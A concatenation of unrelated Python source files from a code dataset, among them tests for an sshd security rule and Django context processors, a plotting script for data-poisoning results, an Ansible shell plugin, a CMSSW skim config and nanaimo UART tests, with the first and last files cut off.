    input_data.add(Specs.installed_rpms, OPENSSH_RPM)
    errors = {
        'AuthenticationMethods': 'badkey',
        'LogLevel': 'normal',
        'PermitRootLogin': 'Yes',
        'Protocol': '1'
    }
    expected = make_response(sshd_secure.ERROR_KEY,
                             errors=errors,
                             openssh=EXPECTED_OPENSSH)
    yield input_data, expected

    # Empty config: unset options are reported as 'default'.
    input_data = InputData("DEFAULT_CONFIG")
    input_data.add(Specs.sshd_config, DEFAULT_CONFIG)
    input_data.add(Specs.installed_rpms, OPENSSH_RPM)
    errors = {
        'AuthenticationMethods': 'default',
        'LogLevel': 'default',
        'PermitRootLogin': 'default'
    }
    expected = make_response(sshd_secure.ERROR_KEY,
                             errors=errors,
                             openssh=EXPECTED_OPENSSH)
    yield input_data, expected
| StarcoderdataPython |
6573275 | <reponame>uktrade/directory-components
from unittest.mock import Mock, patch
import pytest
from directory_components import context_processors
def test_analytics(settings):
    """GTM/UTM settings surface under `directory_components_analytics`."""
    settings.GOOGLE_TAG_MANAGER_ID = '123'
    settings.GOOGLE_TAG_MANAGER_ENV = '?thing=1'
    settings.UTM_COOKIE_DOMAIN = '.thing.com'

    actual = context_processors.analytics(None)

    assert actual == {
        'directory_components_analytics': {
            'GOOGLE_TAG_MANAGER_ID': '123',
            'GOOGLE_TAG_MANAGER_ENV': '?thing=1',
            'UTM_COOKIE_DOMAIN': '.thing.com',
        }
    }
def test_cookie_notice(settings):
    """Privacy cookie domain surfaces under `directory_components_cookie_notice`."""
    settings.PRIVACY_COOKIE_DOMAIN = '.thing.com'
    actual = context_processors.cookie_notice(None)
    assert actual == {
        'directory_components_cookie_notice': {
            'PRIVACY_COOKIE_DOMAIN': '.thing.com',
        }
    }
@pytest.fixture
def sso_user():
    """Mock SSO user exposing the attributes the context processors read."""
    return Mock(
        id=1,
        email='<EMAIL>',
        spec=['id', 'email'],
        hashed_uuid='1234'
    )
@pytest.fixture
def admin_superuser():
    """Mock Django staff user (no hashed_uuid, unlike sso_user)."""
    return Mock(
        id=1,
        email='<EMAIL>',
        spec=['id', 'email'],
        is_staff=True
    )
@pytest.fixture
def request_logged_in(rf, sso_user):
    """GET request carrying a logged-in SSO user."""
    request = rf.get('/')
    request.sso_user = sso_user
    return request
@pytest.fixture
def request_logged_in_admin(rf, admin_superuser):
    """GET request carrying an admin user via request.user (not sso_user)."""
    request = rf.get('/')
    request.user = admin_superuser
    return request
@pytest.fixture
def request_logged_out(rf):
    """GET request with no authenticated SSO user."""
    request = rf.get('/')
    request.sso_user = None
    return request
def test_sso_logged_in(request_logged_in):
    """A request with an sso_user reports sso_is_logged_in True."""
    context = context_processors.sso_processor(request_logged_in)
    assert context['sso_is_logged_in'] is True
def test_sso_profile_url(request_logged_in, settings):
    """The profile URL is passed through from settings unchanged."""
    settings.SSO_PROFILE_URL = 'http://www.example.com/profile/'
    context = context_processors.sso_processor(request_logged_in)
    assert context['sso_profile_url'] == settings.SSO_PROFILE_URL
def test_sso_register_url_url(request_logged_in, settings):
    """The signup URL gains a `next` param pointing back at this request."""
    settings.SSO_PROXY_SIGNUP_URL = 'http://www.example.com/signup/'
    context = context_processors.sso_processor(request_logged_in)
    assert context['sso_register_url'] == (
        'http://www.example.com/signup/?next=http://testserver/'
    )
def test_sso_logged_out(request_logged_out):
    """A request with sso_user=None reports sso_is_logged_in False."""
    context = context_processors.sso_processor(request_logged_out)
    assert context['sso_is_logged_in'] is False
def test_sso_login_url(request_logged_in, settings):
    """The login URL gains a `next` param pointing back at this request."""
    settings.SSO_PROXY_LOGIN_URL = 'http://www.example.com/login/'
    expected = 'http://www.example.com/login/?next=http://testserver/'
    context = context_processors.sso_processor(request_logged_in)
    assert context['sso_login_url'] == expected
def test_sso_logout_url(request_logged_in, settings):
    """The logout URL gains a `next` param pointing back at this request."""
    settings.SSO_PROXY_LOGOUT_URL = 'http://www.example.com/logout/'
    context = context_processors.sso_processor(request_logged_in)
    assert context['sso_logout_url'] == (
        'http://www.example.com/logout/?next=http://testserver/'
    )
def test_sso_user(request_logged_in, sso_user):
    """The request's sso_user object is exposed in the context as-is."""
    context = context_processors.sso_processor(request_logged_in)
    assert context['sso_user'] == sso_user
@patch('django.utils.translation.get_language', Mock(return_value='de'))
def test_ga360_context_processor_all_data(settings, request_logged_in):
    """Logged-in SSO user: GA360 context includes the user's hashed id."""
    settings.GA360_BUSINESS_UNIT = 'Test App'
    context = context_processors.ga360(request_logged_in)

    assert context['ga360'] == {
        'business_unit': 'Test App',
        'site_language': 'de',
        'user_id': '1234',
        'login_status': True
    }
@patch('django.utils.translation.get_language', Mock(return_value='de'))
def test_ga360_context_processor_admin_all_data(settings, request_logged_in_admin):
    """Admin (request.user, no hashed_uuid): logged in but user_id is None."""
    settings.GA360_BUSINESS_UNIT = 'Test App'
    context = context_processors.ga360(request_logged_in_admin)

    assert context['ga360'] == {
        'business_unit': 'Test App',
        'site_language': 'de',
        'user_id': None,
        'login_status': True
    }
def test_ga360_context_processor_no_data(request_logged_out):
    """Anonymous request: default language, no user id, logged out."""
    context = context_processors.ga360(request_logged_out)
    assert context['ga360'] == {
        'site_language': 'en-gb',
        'user_id': None,
        'login_status': False
    }
def test_header_footer_processor(settings):
    """Snapshot of every header/footer URL exposed to templates."""
    context = context_processors.header_footer_processor(None)
    assert context['header_footer_urls'] == {
        'about': 'https://exred.com/about/',
        'dit': 'https://www.gov.uk/government/organisations/department-for-international-trade',
        'get_finance': 'https://exred.com/get-finance/',
        'ukef': 'https://exred.com/get-finance/',
        'performance': 'https://exred.com/performance-dashboard/',
        'privacy_and_cookies': 'https://exred.com/privacy-and-cookies/',
        'terms_and_conditions': 'https://exred.com/terms-and-conditions/',
        'accessibility': 'https://exred.com/accessibility-statement/',
        'cookie_preference_settings': 'https://exred.com/cookies/',
        'fas': 'https://international.com/international/trade/',
        'advice': 'https://exred.com/advice/',
        'markets': 'https://exred.com/markets/',
        'search': 'https://exred.com/search/',
        'services': 'https://exred.com/services/',
        'domestic_news': 'https://exred.com/news/',
        'international_news': 'https://international.com/international/content/news/',
        'how_to_do_business_with_the_uk': 'https://international.com/international/content/how-to-do-business-with-the-uk/', # noqa
        'industries': 'https://international.com/international/content/industries/',
        'market_access': 'https://exred.com/report-trade-barrier/',
        'create_an_export_plan': 'https://exred.com/advice/create-an-export-plan/',
        'find_an_export_market': 'https://exred.com/advice/find-an-export-market/',
        'define_route_to_market': 'https://exred.com/advice/define-route-to-market/',
        'get_export_finance_and_funding': 'https://exred.com/advice/get-export-finance-and-funding/',
        'manage_payment_for_export_orders': 'https://exred.com/advice/manage-payment-for-export-orders/',
        'prepare_to_do_business_in_a_foreign_country': 'https://exred.com/advice/prepare-to-do-business-in-a-foreign-country/', # noqa
        'manage_legal_and_ethical_compliance': 'https://exred.com/advice/manage-legal-and-ethical-compliance/',
        'prepare_for_export_procedures_and_logistics': 'https://exred.com/advice/prepare-for-export-procedures-and-logistics/', # noqa
        'magna_home': 'https://greatcms.com',
        'magna_where_to_export': 'https://greatcms.com/where-to-export/',
        'magna_learn_to_export': 'https://greatcms.com/learn/categories/',
        'magna_exportplan_dashboard': 'https://greatcms.com/export-plan/dashboard/',
        'magna_search': 'https://greatcms.com/search/',
        'magna_privacy_and_cookies': 'https://greatcms.com/privacy-and-cookies/',
        'magna_terms_and_conditions': 'https://greatcms.com/terms-and-conditions/',
        'magna_accessibility': 'https://greatcms.com/accessibility-statement/',
        'magna_cookie_preference_settings': 'https://greatcms.com/cookies/',
        'magna_contact_us': 'https://greatcms.com/contact/',
        'magna_performance': 'https://greatcms.com/performance-dashboard/',
        'magna_account': 'https://greatcms.com/profile/',
        'magna_advice': 'https://greatcms.com/advice/',
        'magna_markets': 'https://greatcms.com/markets/',
        'magna_services': 'https://greatcms.com/services/',
        'magna_international': 'https://greatcms.com/international/'
    }
def test_invest_header_footer_processor():
    """Snapshot of the invest-specific header/footer URLs."""
    context = context_processors.invest_header_footer_processor(None)
    assert context['invest_header_footer_urls'] == {
        'industries': 'https://international.com/international/content/industries/',
        'uk_setup_guide': 'https://international.com/international/content/how-to-setup-in-the-uk/',
    }
def test_urls_processor(settings):
    """Snapshot of the cross-service URLs exposed as `services_urls`."""
    context = context_processors.urls_processor(None)
    assert context['services_urls'] == {
        'contact_us': 'https://exred.com/contact/',
        'contact_us_international': 'https://international.com/international/contact/',
        'events': 'https://events.com',
        'exopps': 'https://exopps.com',
        'exred': 'https://exred.com',
        'fab': 'https://fab.com',
        'fas': 'https://international.com/international/trade/',
        'feedback': 'https://exred.com/contact/feedback/',
        'great_domestic': 'https://exred.com',
        'great_international': 'https://international.com/international/',
        'invest': 'https://international.com/international/invest/',
        'soo': 'https://soo.com',
        'sso': 'https://sso.com',
        'uk_setup_guide': 'https://international.com/international/content/how-to-setup-in-the-uk/',
        'isd': 'https://international.com/international/investment-support-directory/',
        'office_finder': 'https://exred.com/contact/office-finder/',
    }
def test_feature_returns_expected_features(settings):
    """Feature flags from settings are exposed verbatim under 'features'."""
    settings.FEATURE_FLAGS = {
        'COMPANIES_HOUSE_OAUTH2_ENABLED': True
    }

    actual = context_processors.feature_flags(None)

    assert actual == {
        'features': {
            'COMPANIES_HOUSE_OAUTH2_ENABLED': True,
        }
    }
| StarcoderdataPython |
1884434 | <gh_stars>10-100
"""
Plot output json files
"""
import json
import logging
# Silence matplotlib's chatty DEBUG logging before pyplot is imported.
logger = logging.getLogger("matplotlib")
logger.setLevel(logging.INFO)
from matplotlib import pyplot as plt
def classification_poisoning(
    json_filepath="outputs/latest.json", output_filepath=None, show=False
):
    """
    Plot classification results

    json_filepath - filepath for json file
    output_filepath - filepath for saving output graph
        if None, use json_filepath and change ending to .pdf
    show - if True, show the plot instead of saving to file
    """
    with open(json_filepath) as f:
        blob = json.load(f)

    config = blob["config"]
    results = blob["results"]
    data = config["dataset"]["name"]
    knowledge = config["attack"]["knowledge"]
    # BUG FIX: `defense` was only bound when config["defense"] was truthy,
    # so building the title below raised NameError for undefended runs.
    defense = config["defense"]["name"] if config["defense"] else "no"

    # Derive the plot filename from the json filename unless given.
    if output_filepath is None and not show:
        output_filepath = json_filepath
        if output_filepath.endswith(".json"):
            output_filepath = output_filepath[: -len(".json")]
        output_filepath += "_{}.pdf"

    for metric_name in [
        "undefended_backdoor_success_rate",
        "defended_backdoor_success_rate",
        "delta_accuracy",
    ]:
        main_title = f"{data} for {knowledge}-box attack \nwith {defense} defense."
        # Results are keyed by fraction-poisoned (stored as strings).
        fraction_poisons = results[metric_name + "_mean"].keys()
        metric_mean = [results[metric_name + "_mean"][k] for k in fraction_poisons]
        metric_std = [results[metric_name + "_std"][k] for k in fraction_poisons]
        fraction_poisons = list(map(float, fraction_poisons))

        # Mean with std-dev error bars at each poisoning fraction.
        plt.errorbar(fraction_poisons, metric_mean, metric_std, capsize=5)
        plt.title(main_title)
        plt.xlabel("Fraction of dataset poisoned")
        plt.ylabel(f"Model performance ({metric_name})")
        if show:
            plt.show()
        else:
            plt.tight_layout()
            plt.savefig(output_filepath.format(metric_name), format="pdf")
        plt.close()
| StarcoderdataPython |
4802761 | # Search a 2D Matrix
class Solution:
    def searchRow(self, matrix, target):
        """Return the index of the only row that could contain *target*:
        the last row whose first element is <= target (row 0 if none is).

        Uses stdlib bisect instead of the previous hand-rolled, convoluted
        binary search; also no longer crashes on an empty matrix.
        """
        from bisect import bisect_right
        firsts = [row[0] for row in matrix]
        return max(bisect_right(firsts, target) - 1, 0)

    def searchMatrix(self, matrix, target):
        """Return True iff *target* occurs in the row-wise sorted matrix."""
        from bisect import bisect_left
        if not matrix or not matrix[0]:
            # Robustness: the previous version raised IndexError here.
            return False
        row = matrix[self.searchRow(matrix, target)]
        # Binary search within the candidate row.
        i = bisect_left(row, target)
        return i < len(row) and row[i] == target
if __name__ == "__main__":
    # Ad-hoc manual check; the second (matrix, target) pair overwrites the
    # first, so only target=3 is actually exercised.
    sol = Solution()
    matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]]
    target = 12
    matrix = [[1,3,5,7],[10,11,16,20],[23,30,34,60]]
    target = 3
    print(sol.searchMatrix(matrix, target))
| StarcoderdataPython |
9745332 | from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.plugins.shell.sh import ShellModule as ShModule
class ShellModule(ShModule):
    """sh-based Ansible shell plugin that runs every module command inside
    a zsh login shell (so the remote user's rc files and PATH apply)."""

    def build_module_command(self, env_string, shebang, cmd, arg_path=None, rm_tmp=None):
        # Build the standard sh command line first, then wrap it.
        new_cmd = super(ShellModule, self).build_module_command(env_string, shebang, cmd, arg_path, rm_tmp)
        # NOTE(review): new_cmd is interpolated into double quotes without
        # escaping; commands containing `"` would break — confirm inputs.
        new_cmd = '/bin/zsh -l -c "%s"' % (new_cmd)
        return new_cmd
| StarcoderdataPython |
3294755 | # STD
import unittest
from unittest import mock as mock
# PROJECT
import bwg
from tests.fixtures import RELATION_MERGING_TASK
from tests.toolkit import MockOutput, MockInput
class RelationMergingTaskTestCase(unittest.TestCase):
    """
    Test RelationMergingTask.
    """
    @mock.patch('bwg.tasks.relation_merging.RelationMergingTask.output')
    @mock.patch('bwg.tasks.relation_merging.RelationMergingTask.input')
    def test_task_functions(self, input_patch, output_patch):
        # Patch the Luigi-style workflow_resources property so the task can
        # be constructed without its real resources.
        with mock.patch(
            "bwg.tasks.relation_merging.RelationMergingTask.workflow_resources", new_callable=mock.PropertyMock()
        ) as workflow_mock:
            task_config = {
                "CORPUS_ENCODING": "",
                "RELATION_MERGING_OUTPUT_PATH": ""
            }
            output_patch.return_value = MockOutput()
            # The task reads from two inputs; feed both the same fixture.
            input_patch.return_value = (
                MockInput(RELATION_MERGING_TASK["input"][0]),
                MockInput(RELATION_MERGING_TASK["input"][0])
            )
            workflow_mock.__get__ = mock.Mock(return_value={})
            task = bwg.tasks.relation_merging.RelationMergingTask(task_config=task_config)

            # Testing
            self._test_get_relations_from_sentence_json()
            self._test_is_relevant_article(task)
            self._test_is_relevant_sentence(task)

    @staticmethod
    def _test_get_relations_from_sentence_json():
        # TODO (Implement) [DU 28.07.17]
        pass

    @staticmethod
    def _test_is_relevant_article(task):
        # TODO (Implement) [DU 28.07.17]
        pass

    @staticmethod
    def _test_is_relevant_sentence(task):
        # TODO (Implement) [DU 28.07.17]
        pass
6537736 | <filename>repiko/module/ygoOurocg_ver4.py
#coding:utf-8
import sqlite3
import configparser
import json
from urllib import request
from urllib import parse
from bs4 import BeautifulSoup
from .ygo.card import Card,CardAttribute,CardRace,CardType,LinkMark
class ourocg():
    def __init__(self):
        #config = configparser.ConfigParser()
        #config.read('setting.ini')
        #self.path=config["ygo"]["ygopath"]
        # Index into the translated-name lists scraped from ourocg; default 2
        # selects the third variant (SetTranslateEdition: "cn"->0, "nw"->1).
        self.edition=2
    def SetTranslateEdition(self,ed):
        """Select which translated card name to prefer (case-insensitive):
        "cn" -> 0, "nw" -> 1; any other value leaves the edition unchanged."""
        if ed.lower()=="cn":
            self.edition=0
        elif ed.lower()=="nw":
            self.edition=1
    def FindCardByName(self,searchtext):
        """Search ourocg.cn for a card by name and scrape its detail page.

        Returns a populated Card, or None when nothing matches. The search
        first tries an exact match against any of the four name variants,
        then falls back to the first result.
        """
        #result="找不到卡片的说……"
        url=r"https://www.ourocg.cn/search/{k}"
        kw =searchtext
        #cn=kw
        kw=parse.quote(kw)
        encode_url=url.format(k=kw)
        #print(encode_url)
        req=request.urlopen(encode_url)
        raw_html=req.read().decode("utf8")
        html=BeautifulSoup(raw_html,"lxml")
        targeturl=""
        Pmark=[]
        # A title starting with the search marker means we landed on the
        # search-results page; otherwise we were redirected straight to a card.
        if html.find_all("title")[0].string.startswith("搜索"):
            scripts=html.find_all("script")
            for s in scripts:
                # Results are embedded as a JS object assigned to
                # window.__STORE__; strip the assignment and parse the JSON.
                if(str(s.string).strip().startswith("window.__STORE__")):
                    targets=str(s.string[s.string.find("{"):]).strip()[:-1]
                    carddata=json.loads(targets)
                    sts=searchtext.strip()
                    # Exact match on any name variant wins.
                    for tar in carddata["cards"]:
                        if tar["name"]== sts or tar["name_nw"]==sts or tar["name_ja"]== sts or tar["name_en"]== sts:
                            targeturl=tar["href"].replace("\\","")
                            Pmark=[tar.get("pend_l",None),tar.get("pend_r",None)]
                            #print(Pmark)
                    # Fall back to the first search result.
                    if targeturl=="" and len(carddata["cards"])!=0:
                        tar=carddata["cards"][0]
                        targeturl=tar["href"].replace("\\","")
                        Pmark=[tar.get("pend_l",None),tar.get("pend_r",None)]
                    #print(targeturl)
                    break
        else:
            targeturl=encode_url
        if targeturl!="":
            # Fetch the card detail page and scrape its field values.
            encode_url=targeturl
            req=request.urlopen(encode_url)
            raw_html=req.read().decode("utf8")
            #print(encode_url)
            html=BeautifulSoup(raw_html,"lxml")
            isRD=False
            if html.find("div",{"class":"rd-mark"}):
                isRD=True
            # divr: list of text fragments per "val" div, in page order.
            div=html.find_all("div",{"class":"val"})
            divr=[[y for y in x.stripped_strings] for x in div]
            #print(divr)
            cardtypes=divr[3]
            c=Card(cardtypes)
            if c.isLink:
                # Link arrows: class like "mark_<n>_on" marks arrow n active.
                linkmark=html.find("div",{"class":"linkMark"})
                for mark in linkmark.find_all("i"):
                    temp=mark["class"][1].split("_")
                    if temp[2]=="on":
                        c.linkmark.add( LinkMark.fromNumber(int(temp[1]),True) )
            c.name=divr[0][self.edition]
            jpname=divr[1][0]
            if jpname!="-":
                c.jpname=jpname.replace("・","·")
            enname=divr[2][0]
            if enname!="-":
                c.enname=enname
            c.isRD=isRD
            c.id=divr[4][0]
            # Rush Duel pages lack one field, shifting later indices by one.
            limitnum=5
            if isRD:
                limitnum=4
            c.limit=divr[limitnum][0]
            otnum=limitnum+1
            if divr[otnum]: # card is OCG/TCG exclusive
                c.ot=divr[otnum][0]
            effectnum=-1
            if c.isMonster:
                c.race=CardRace.fromStr(divr[otnum+1][0])
                c.attribute=CardAttribute.fromStr(divr[otnum+2][0])
                if c.isXyz:
                    c.rank=ourocg.dealInt(divr[otnum+3][0])
                    c.level=c.rank
                if c.isP:
                    c.Pmark=Pmark
                if c.isLink:
                    # Link monsters have no DEF; slot otnum+5 holds link number.
                    c.linknum=ourocg.dealInt(divr[otnum+5][0])
                    c.level=c.linknum
                    c.attack=ourocg.dealInt(divr[otnum+4][0])
                else:
                    c.level=ourocg.dealInt(divr[otnum+3][0])
                    c.attack=ourocg.dealInt(divr[otnum+4][0])
                    c.defence=ourocg.dealInt(divr[otnum+5][0])
            # The last "val" div holds all effect-text translations back to
            # back; locate the repeated trailing line to split it into the
            # per-edition slices, then keep the selected edition's slice.
            L=len(divr[effectnum])
            tempString=divr[effectnum][-1]
            effectlist=[0]
            for x in range(-2,-1*(L+1),-1):
                if divr[effectnum][x]==tempString:
                    tempnum=-1-x
                    effectlist.append(L-2*tempnum)
                    effectlist.append(effectlist[1]+tempnum)
                    effectlist.append(effectlist[2]+tempnum)
            effects=divr[effectnum][effectlist[self.edition]:effectlist[self.edition+1]]
            effectText="\n".join(effects)
            c.effect=ourocg.beautifyText(effectText)
            return c
        return None
def getWikiLink(self,card):
if card.jpname:
pageword=f"《{ourocg.towikistr(card.jpname)}》"
elif card.enname:
pageword=f"《{card.enname}》"
else:
return None
pageword=parse.quote(pageword,encoding="euc-jp")
return r"https://yugioh-wiki.net/index.php?cmd=read&page="+pageword
@staticmethod
def towikistr(text):
"""半角转全角,以及一些特殊符号的转换"""
transDict={
#' ':chr(12288), #半角空格直接转化
'·':'・',
'-':'−',
"Ⅰ":"I",
"Ⅱ":"II",
"Ⅲ":"III",
"Ⅳ":"IV",
"Ⅴ":"V",
"Ⅵ":"VI",
"Ⅶ":"VII",
"Ⅷ":"VIII",
"Ⅸ":"IX",
"Ⅹ":"X",
"Ⅺ":"XI",
"Ⅻ":"XII"
}
r = ""
for c in text:
trans=transDict.get(c,None)
if trans:
c=trans
else:
oc=ord(c)
if oc > 32 and oc <= 126: #半角字符(除空格)根据关系转化
c=chr(oc+65248)
r += c
return r
@staticmethod
def dealInt(text):
if text.isdigit():
return int(text)
else:
return text
@staticmethod
def beautifyText(text):
"""试着给效果文本加换行,好看一点"""
nums=set(list("①②③④⑤⑥⑦⑧⑨⑩●"))
transDict={"・":"·"}
r = ""
l=len(text)
for i,c in enumerate(text):
trans=transDict.get(c,None)
if trans:
c=trans
elif c in nums:
if 1<i<l-1 and text[i-1]!="\n" and text[i+1]==":":
c="\n"+c
r+=c
return r
if __name__ == "__main__":
    # Manual smoke test: read a card name from stdin and print the lookup result.
    text=input()
    a=ourocg()
    print(a.FindCardByName(text))
| StarcoderdataPython |
8168124 | import FWCore.ParameterSet.Config as cms
# CMSSW skim configuration: selects CRAFT cosmic events whose muon/track
# candidates point at the tracker, writing a RAW-RECO "TrackingPointing" skim.
process = cms.Process("SKIM")

# Input: CRAFT cosmics RECO with the parent RAW files attached as secondaries.
process.source = cms.Source("PoolSource",
    fileNames = cms.untracked.vstring(
        '/store/data/Commissioning08/Cosmics/RECO/CRAFT_ALL_V9_225-v2/0000/FE32B1E4-C7FA-DD11-A2FD-001A92971ADC.root'),
    secondaryFileNames = cms.untracked.vstring(
        '/store/data/Commissioning08/Cosmics/RAW/v1/000/068/000/708C5612-CFA5-DD11-AD52-0019DB29C5FC.root',
        '/store/data/Commissioning08/Cosmics/RAW/v1/000/068/000/38419E41-D1A5-DD11-8B68-001617C3B6E2.root',
        '/store/data/Commissioning08/Cosmics/RAW/v1/000/068/000/2CDF3B0F-CFA5-DD11-AE18-000423D99A8E.root')
)
process.configurationMetadata = cms.untracked.PSet(
    version = cms.untracked.string('$Revision: 1.10 $'),
    name = cms.untracked.string('$Source: /cvs_server/repositories/CMSSW/CMSSW/DPGAnalysis/Skims/python/TrackerPointing_cfg.py,v $'),
    annotation = cms.untracked.string('CRAFT TrackerPointing skim')
)
process.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(10))
process.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))

# Standard conditions, geometry, magnetic field and cosmic reconstruction.
process.load("Configuration.StandardSequences.MagneticField_cff")
process.load("Configuration.StandardSequences.Geometry_cff")
process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")
process.GlobalTag.globaltag = 'CRAFT_V4P::All'
process.prefer("GlobalTag")
process.load("Configuration.StandardSequences.ReconstructionCosmics_cff")

# Require at least one reconstructed track from each cosmic tracking algorithm.
process.cosmictrackfinderP5TkCntFilter = cms.EDFilter("TrackCountFilter",
    src = cms.InputTag('cosmictrackfinderP5'),
    minNumber = cms.uint32(1)
)
process.ctfWithMaterialTracksP5TkCntFilter = cms.EDFilter("TrackCountFilter",
    src = cms.InputTag('ctfWithMaterialTracksP5'),
    minNumber = cms.uint32(1)
)
process.rsWithMaterialTracksP5TkCntFilter = cms.EDFilter("TrackCountFilter",
    src = cms.InputTag('rsWithMaterialTracksP5'),
    minNumber = cms.uint32(1)
)
# Accept standalone cosmic muons whose extrapolation crosses a cylinder of
# radius 90 cm and half-length 130 cm around the tracker.
process.cosmicMuonsBarrelOnlyTkFilter = cms.EDFilter("HLTMuonPointingFilter",
    SALabel = cms.InputTag("cosmicMuonsBarrelOnly"),
    PropagatorName = cms.string("SteppingHelixPropagatorAny"),
    radius = cms.double(90.0),
    maxZ = cms.double(130.0)
)

# One selection path per filter; the output module ORs them together.
process.cosmicMuonsBarrelOnlyTkPath = cms.Path(process.cosmicMuonsBarrelOnlyTkFilter)
process.cosmictrackfinderP5TkCntPath = cms.Path(process.cosmictrackfinderP5TkCntFilter)
process.ctfWithMaterialTracksP5TkCntPath = cms.Path(process.ctfWithMaterialTracksP5TkCntFilter)
process.rsWithMaterialTracksP5TkCntPath = cms.Path(process.rsWithMaterialTracksP5TkCntFilter)

process.out = cms.OutputModule("PoolOutputModule",
    outputCommands = cms.untracked.vstring('keep *','drop *_MEtoEDMConverter_*_*'),
    SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('cosmicMuonsBarrelOnlyTkPath',
                                                                 'cosmictrackfinderP5TkCntPath',
                                                                 'ctfWithMaterialTracksP5TkCntPath',
                                                                 'rsWithMaterialTracksP5TkCntPath')),
    dataset = cms.untracked.PSet(
        dataTier = cms.untracked.string('RAW-RECO'),
        filterName = cms.untracked.string('TrackingPointing')),
    fileName = cms.untracked.string('trackerPointing.root')
)
process.this_is_the_end = cms.EndPath(process.out)
| StarcoderdataPython |
4872744 | <reponame>manojkumar-github/DataStructures-DynamicProgramming-in-Python-JAVA-Cplusplus
#!/usr/bin.env python
# Copyright (C) Pearson Assessments - 2020. All Rights Reserved.
# Proprietary - Use with Pearson Written Permission Only
import flask
app = flask.Flask(__name__)
# NOTE(review): debug mode must never be enabled in production — confirm this
# file is development-only.
app.config["DEBUG"] = True

@app.route('/foo', methods=['GET'])
def sample():
    """Return a fixed placeholder payload for GET /foo."""
    return "a sample API"

# NOTE(review): app.run() executes at import time (no __main__ guard) — confirm
# this module is only ever executed directly, never imported.
app.run()
| StarcoderdataPython |
1802246 | <reponame>chndear/nanaimo<gh_stars>10-100
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# This software is distributed under the terms of the MIT License.
#
import argparse
import os
import typing
from unittest.mock import MagicMock
import pytest
import material
import nanaimo
import nanaimo.config
import nanaimo.connections
import nanaimo.connections.uart
import nanaimo.instruments.jlink
import nanaimo.parsers
import nanaimo.parsers.gtest
from nanaimo import set_subprocess_environment
@pytest.mark.timeout(10)
def test_uart_monitor(serial_simulator_type: typing.Type) -> None:
    """
    Verify the nanaimo.ConcurrentUart class using a mock serial port.
    """
    serial = serial_simulator_type(material.FAKE_TEST_SUCCESS)
    last_line = material.FAKE_TEST_SUCCESS[-1]
    with nanaimo.connections.uart.ConcurrentUart(serial) as monitor:
        # Poll until the final fake line appears, yielding the CPU whenever the
        # reader has not produced a line yet; the timeout mark bounds the loop.
        while True:
            line = monitor.readline()
            if line is None:
                os.sched_yield()
                continue
            elif line == last_line:
                break
@pytest.mark.asyncio
async def test_failed_test(serial_simulator_type: typing.Type) -> None:
    """A failing gtest output stream must yield result 1 from the parser."""
    serial = serial_simulator_type(material.FAKE_TEST_FAILURE)
    with nanaimo.connections.uart.ConcurrentUart(serial) as monitor:
        assert 1 == await nanaimo.parsers.gtest.Parser(10).read_test(monitor)
@pytest.mark.asyncio
async def test_timeout_while_monitoring(serial_simulator_type: typing.Type) -> None:
    """Non-gtest output with no repetition must make the parser time out
    (4 s budget) and return a non-zero result."""
    serial = serial_simulator_type(['gibberish'], loop_fake_data=False)
    with nanaimo.connections.uart.ConcurrentUart(serial) as monitor:
        assert 0 != await nanaimo.parsers.gtest.Parser(4.0).read_test(monitor)
def test_enable_default_from_environ(nanaimo_defaults: nanaimo.config.ArgumentDefaults) -> None:
    """Environment-backed defaults are only legal for long-form (--) options."""
    a = nanaimo.Arguments(argparse.ArgumentParser(), nanaimo_defaults)
    a.add_argument('yep', enable_default_from_environ=False)
    # Positional arguments and short options must reject environ defaults.
    with pytest.raises(ValueError):
        a.add_argument('nope', enable_default_from_environ=True)
    with pytest.raises(ValueError):
        a.add_argument('-n', enable_default_from_environ=True)
    a.add_argument('--yep', enable_default_from_environ=True)
    # Re-registering the same long option is rejected.
    with pytest.raises(RuntimeError):
        a.add_argument('--yep', enable_default_from_environ=True)
@pytest.mark.parametrize('required_prefix,test_positional_args,test_expected_args',
                         [  # type: ignore
                             ('tt', ['--foo-bar'], ['--tt-foo-bar']),
                             ('z', ['-f', '--foo-bar'], ['-f', '--z-foo-bar']),
                             ('pre', ['--foo-bar', '-x'], ['--pre-foo-bar', '-x']),
                             ('a', ['-foo-bar', '-x'], ['-foo-bar', '-x'])
                         ])
def test_require_prefix(required_prefix, test_positional_args, test_expected_args) -> None:
    """Long (--) options gain the required prefix; short/one-dash options pass through."""
    parser = MagicMock(spec=argparse.ArgumentParser)
    parser.add_argument = MagicMock()
    a = nanaimo.Arguments(parser, required_prefix=required_prefix)
    a.add_argument(*test_positional_args)
    parser.add_argument.assert_called_once_with(*test_expected_args)
def test_set_subprocess_environment_no_environ() -> None:
    """
    Verify that no exceptions are thrown if the defaults config lacks an ``environ`` key.
    """
    defaults = MagicMock(spec=nanaimo.config.ArgumentDefaults)
    # Simulate a config with no keys at all: every lookup raises KeyError.
    defaults.__getitem__ = MagicMock(side_effect=KeyError())
    set_subprocess_environment(nanaimo.Namespace(defaults=defaults))
def test_get_as_merged_dict() -> None:
    """
    Verify that no exceptions are thrown if the defaults config lacks an ``environ`` key
    when using Namespace.get_as_merged_dict()
    """
    defaults = MagicMock(spec=nanaimo.config.ArgumentDefaults)
    # Simulate a config with no keys at all: every lookup raises KeyError.
    defaults.__getitem__ = MagicMock(side_effect=KeyError())
    nanaimo.Namespace(defaults=defaults).get_as_merged_dict('environ')
| StarcoderdataPython |
1984271 | <reponame>jensv/relative_canonical_helicity_tools
import numpy as np
from invert_curl.invert_curl import devore_invert_curl
from laplace_solver.laplace_solver import laplace_3d_dct_fd
import vector_calculus.vector_calculus as vc
def determine_reference_fields(mesh, circulation,
                               return_scalar_ref=False):
    r"""
    Compute the reference fields used for relative-helicity calculations.

    A scalar potential is obtained by solving Laplace's equation with
    boundary data chosen so that the reference circulation's normal
    component cancels that of *circulation* on the surface
    (:math:`-\vec{Circ}_{ref} \cdot \hat{n} = \vec{Circ} \cdot \hat{n}`).
    Its gradient gives the reference circulation, and inverting the curl
    of that yields the reference general momentum.

    Parameters
    ----------
    mesh : list of ndarray
        3D mesh.
    circulation : list of ndarray
        3D curl quantity, e.g. magnetic field B or flow vorticity omega.
    return_scalar_ref : bool, optional
        When True, the scalar potential is returned as a third element.

    Returns
    -------
    tuple
